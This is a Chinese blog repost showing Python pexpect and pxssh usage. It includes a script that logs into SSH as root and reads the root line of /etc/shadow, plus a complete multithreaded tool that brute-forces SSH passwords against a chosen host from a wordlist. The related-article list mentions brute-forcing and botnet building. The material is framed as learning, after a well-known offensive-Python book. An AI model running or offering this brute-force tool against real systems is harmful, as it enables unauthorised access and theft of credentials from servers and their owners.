Pexpect 模块登录ssh以及pxssh模块暴力破解ssh密码

最新推荐文章于 2023-08-23 08:49:04 发布
最新推荐文章于 2023-08-23 08:49:04 发布
阅读量102 收藏
点赞数
CC 4.0 BY-SA版权
原文链接:http://www.cnblogs.com/tclan126/p/8998910.html
本文介绍如何使用Pexpect和pxssh模块实现SSH连接及密码破解。通过具体代码示例展示了Pexpect的基本用法,包括expect和send方法,以及如何利用pxssh进行SSH登录尝试。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

利用Pexpect模块交互

这里centos系统

代码

# -*- coding: utf-8 -*-
# @Author  : Lan126

import pexpect

PROMPT = ["# ", ">>> ", "> ", "\$ "]


def connect(user, host, password):
    ssh_newkey = "Are you sure you want to continue connecting"
    connStr = "ssh " + user + "@" + host
    child = pexpect.spawn(connStr)
    ret = child.expect([pexpect.TIMEOUT, ssh_newkey, "[p|P]assword:"])
    if ret == 0:
        print("[-] Error Connecting")
        return
    if ret == 1:
        child.sendline("yes")
        ret = child.expect([pexpect.TIMEOUT, "[p|P]assword:"])
        if ret == 0:
            print("[-] Error Connecting")
            return
    child.sendline(password)
    child.expect(PROMPT)
    return child


def send_command(child, cmd):
    child.sendline(cmd)
    child.expect(PROMPT)
    print((child.before).encode("utf-8"))


def main():
    host = "localhost"
    user = "root"
    password = "*************************"
    child = connect(user, host, password)
    send_command(child, "cat /etc/shadow | grep root")


if __name__ == "__main__":
    main()

结果图

1101538-20180506173656793-927213673.png

细节

下面是从Pexpect文档中复制的一句话基本上可以概括这一个脚本的所有知识点了

There are two important methods in Pexpect – expect() and send() (or sendline() which is like send() with a linefeed).
The expect() method waits for the child application to return a given string. The string you specify is a regular expression,
so you can match complicated patterns. The send() method writes a string to the child application.
From the child’s point of view it looks just like someone typed the text from a terminal.
After each call to expect() the before and after properties will be set to the text printed by child application.
The before property will contain all text up to the expected string pattern. The after string will contain the text that was matched by the expected pattern

spawnclass的作用如下

This is the main class interface for Pexpect. Use this class to start and control child applications.

利用pxssh暴力破解ssh密码

这里也是centos系统

代码

# -*- coding: utf-8 -*-
# @Author  : Lan126

import optparse
from pexpect import pxssh
import time
from threading import *

maxConnections = 5
connection_lock = BoundedSemaphore(value=maxConnections)
Found = False
Fails = 0


def connect(host, user, password, release):
    global Found
    global Fails
    try:
        s = pxssh.pxssh()
        s.login(host, user, password)
        print("[+] Password Found " + password)
        Found = True
    except Exception as e:
        if "read_nonblocking" in str(e):
            Fails += 1
            time.sleep(5)
            connect(host, user, password, False)
        elif "synchronize with original prompt" in str(e):
            time.sleep(1)
            connect(host, user, password, False)
    finally:
        if release:
            connection_lock.release()


def main():
    parser = optparse.OptionParser("usage%prog" + "-H <target host> -u <user> -F <password list>")
    parser.add_option("-H", dest="tgtHost", type="string", help="specify target host")
    parser.add_option("-u", dest="user", type="string", help="specify the user")
    parser.add_option("-F", dest="passwordFile", type="string", help="specify password file")
    options, args = parser.parse_args()
    host = options.tgtHost
    passwdFile = options.passwordFile
    user = options.user
    if host is None or passwdFile is None or user is None:
        print(parser.usage)
        exit(0)
    fn = open(passwdFile, "r")
    for line in fn.readlines():
        if Found:
            # 如果发现了密码就退出
            print("[*] Exiting: Password Found")
            exit(0)
        if Fails > 5:
            print("[!] Too Many Socket Timeouts")
            exit(0)
        connection_lock.acquire()
        password = line.strip("\r").strip("\n")
        print("[-] Testing: " + str(password))
        t = Thread(target=connect, args=(host, user, password, True))
        t.start()


if __name__ == "__main__":
    main()

结果图

1101538-20180506173759475-950388168.png

细节

这其实也是上面那个脚本的更高级的封装不过就是加了一个读取密码文件的过程而已
这一个脚本的知识点有全局变量,信号量,以及pxssh模块的使用,它可以直接用login()等函数与ssh交互
BoundedSemaphore类了解一下

A bounded semaphore implementation. Inherit from Semaphore.
This raises ValueError in release() if it would increase the value above the initial value.

转载于:https://www.cnblogs.com/tclan126/p/8998910.html

python—用Pxssh暴力破解SSH密码
qq_28840013的博客
11-29 1520
Pxssh暴力破解SSH密码 参考于《python绝技 运用python成为顶级黑客》 SSH相关介绍: SSH是主要用于为远程登陆会话提供安全保障的协议(即实现远程命令行操作) SSH可提供两种级别的安全验证: 1.基于口令的安全验证: 通过帐号和密码登录到远程主机 攻击方式:暴力破解 / “中间人”攻击 2.基于密匙的安全验证: 需要依靠密匙,也就是你必须为自己创建一对密匙,并把公用...
Python脚本暴力破解SSH口令以及构建僵尸网络(pxssh)
墨鱼菜鸡
11-03 112
目录 暴力破解SSH口令 SSH远端执行命令 构建僵尸网络 环境:Kali Linux python 2.7.13 暴力破解SSH口令 Pxsshpexpect库的ssh专用脚本,他能用预先写好的 login()、logout() 和 prompt() 等函数直接与SSH进行交互 。对于...
shell脚本中使用expect实现交互操作:如ssh、修改密码、开通证书
weixin_54851134的博客
12-03 823
shell脚本中使用expect实现交互操作
Python 的pexpect 破解主机密码
u014492019的专栏
05-23 1157
1.在进行编写程序之前,我并不知道paramiko模板,其功能可以将ssh进行封装,类似的还有pxssh模板,该模板是基于pexpect模块。但是我仍旧选择pexpext进行编写,虽然很low,各位看官不要介意哦 2.程序展示部分 #!/usr/bin/python import pexpect #define passwd passwd=['1234567,'23b
基于pexpect开发,可以实现ssh自动化登录脚本
小傅
07-03 446
pexpect是用于模拟人的行为的一个python包(windows下和linux下是不一样的) pexpect中含有一个类class。具体用法参考官方文档 https://pexpect.readthedocs.io/en/stable/api/index.html 这里简述以下pexpect pexpect.spawn(a),其中a对应于你需要运行的子程序,如是ssh连接还是ft...
pexpect模块pxssh类login()函数源代
polaris_119的专栏
05-08 1141
pexpect模块pxssh类源代 SSH登录指定的主机。 def login (self, server, username=None, password='', terminal_type='ansi', original_prompt=r"[#$]", login_timeout=10, port=None, ...
Python-Pexpect模块pxssh遇到连接不成功的问题
成字第0431879
08-16 1219
  在linux上运行ssh连接脚本如下: #!/usr/bin/python import pxssh import getpass try:         s = pxssh.pxssh()         hostname=raw_input('hostname: ')         username=raw_input('username: ')         pa...
Python 开发一个帐号密码暴力破解程序
weixin_46703850的博客
09-22 3813
支持FTP、MySQL、SSH、Sqlserver协议 功能:每次破解可以设置时间间隔,破解中断下次破解可以读取历史继续上一次的破解。支持多线程,可自行设置线程数.
Ssh-Ninja:适用于Bruteforce安全Shell协议的Python脚本
04-05
我使用pxssh是基于Pexpect的Python模块,用于建立SSH连接。 它的类扩展了pexpect.spawn以专门设置SSH连接。 是一个专门的模块,提供了直接与SSH会话进行交互的特定方法,例如login() , logout()和prompt(&#41...
Linux被暴力破解纪实
最新发布
程序员青菜学厨记
08-23 140
声明:本文仅供技术交流使用,严禁采用本文的方法进行任何非法活动。上一篇文章 Redis被攻击纪实 讲了我们测试环境Redis被攻击,今天再讲一下生产环境Linux被暴力破解的事情(更狗血),这件事就发生在今年,当时一台亚马逊生产环境机器是宁波技术团队的人负责购买然后交付给我们使用,开始是提供一个私钥文件给我,我觉用私钥不方便,让其直接提供密码给我,人家很客气,马上设置一个密码给到我 ,密码是:zaqxswcde,直到有一天,生产环境机器登录不上去,被当成挖矿机了。。。。。
记录python ssh 密码爆破过程
weixin_42489272的博客
01-11 1000
我的第一篇博客 记录python ssh 密码爆破过程 1.使用python pexpect 模块 *windows 下 pexpect.spawn()函数无效,必须在linux上使用 pexpect模块ssh连接源 import pexpect PROMPT = [’#’, ‘&gt;&gt;&gt;’, ‘&gt;’, ‘$’] def send_command(child, cmd): ...
pexpect &&pxssh
Ljq730828的博客
05-15 274
python 3.6 pip install pexpect #!/usr/bin/python3 import os import sys curPath = os.path.abspath(os.path.dirname(__file__)) rootPath = os.path.split(curPath)[0] sys.path.append(rootP...
关于《Python绝技:运用Python成为顶级黑客》的学习笔记
热门推荐
u014538198的专栏
06-22 1万+
这里将会把《Python绝技:运用Python成为顶级黑客》中的代敲一遍,然后根据具体的情况修改一下代,时间足够的话就会继续敲代更新一下,期间肯定会有很多问题需要懂得的大牛指导一下~ 为了巩固一下基础,就从头到尾地敲一遍吧~ 第一章——入门 1、准备开发环境 安装第三方库: 安装Python-nmap包: wget http://xael.or
python pexpect 使用详解--针对远程登录机器,在机器上做各种操作,返回交互信息等等
码厦(微信号)
10-28 8560
Pexpect 是一个用来启动子程序并对其进行自动控制的纯 Python 模块,因此在模拟人对程序的控制上表现很好,由于项目需要,看了一些关于pexpect的api文档和部分源,这里对立面一些关键函数使用部分进行解释说明,部分内部源会进行截取以供分析,自己的例子也会给出,主要是针对ssh远程登录,然后执行一些hive任务,将执行期间的各种状态信息获取。这里给出个例子,可以根据业务需要封装成更通
python之pexpect+pxssh模块的使用心得 (转)
Recar的博客
01-21 3325
看到这个表哥写的很好就转载了,也方便以后自己使用 原文:http://blog.sina.com.cn/s/blog_1574497330102wjbj.html今天学习了python的pexpect的使用,此模块的作用是提供自动化的交互,极大的方便了处理一系列需要手动的输入问题 linux用bash,windows用cmd来执行命令行,我们在引入模块后可以用spawn来运行相应的命令. 我们
python---使用pxssh模块模拟ssh登录linux主机
xwbk12的博客
12-26 958
python—使用pxssh模块模拟ssh linux主机1、配置环境, 客户端192.168.40.128,服务器192.168.40.129 客户端ssh登录服务器能够成功root@kali:~/python/anquangongji# ssh root@192.168.40.129 Enter passphrase for key '/root/.ssh/id_dsa': Linux k
python自动输入密码ssh_python(pexpect)自动ssh脚本
weixin_39773447的博客
12-09 1202
python(pexpect)简单的自动ssh脚本安装python的pexpect模块# apt-get install python-pip# pip install pexpect# vi ssh.py按a或i进入编辑模式#!/usr/bin/python#/usr/bin/pythonimport pexpectchild=pexpect.spawn('ssh zhiming@10.0.0....
Pexpect模块pxssh扩展子模块详解
成长的足迹
07-03 4724
Pexpect模块中,pexpect.pxssh.pxssh类扩展自pexpect.spawn类,专用于SSH连接的设置。 通过pxssh类的login()方法,在第一次连接远程SSH服务器的时候,能够将服务器的证书保存在known_hosts中。 pxssh类支持通过密钥认证,而无需输入密码pxssh类使用的Shell提示符能够兼容大多数Borne/Bash或Csh。 基本使用示例
深入解析Python中的pexpect模块及其应用
目前,pexpect模块还保持着活跃的开发状态,社区里也有不少针对特定领域或场景优化的衍生项目,如pxssh、pxweb、pypop3d等。 #### 7. 总结 pexpect模块是Python中处理交互式程序的强力工具,它以其强大的功能和灵活...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值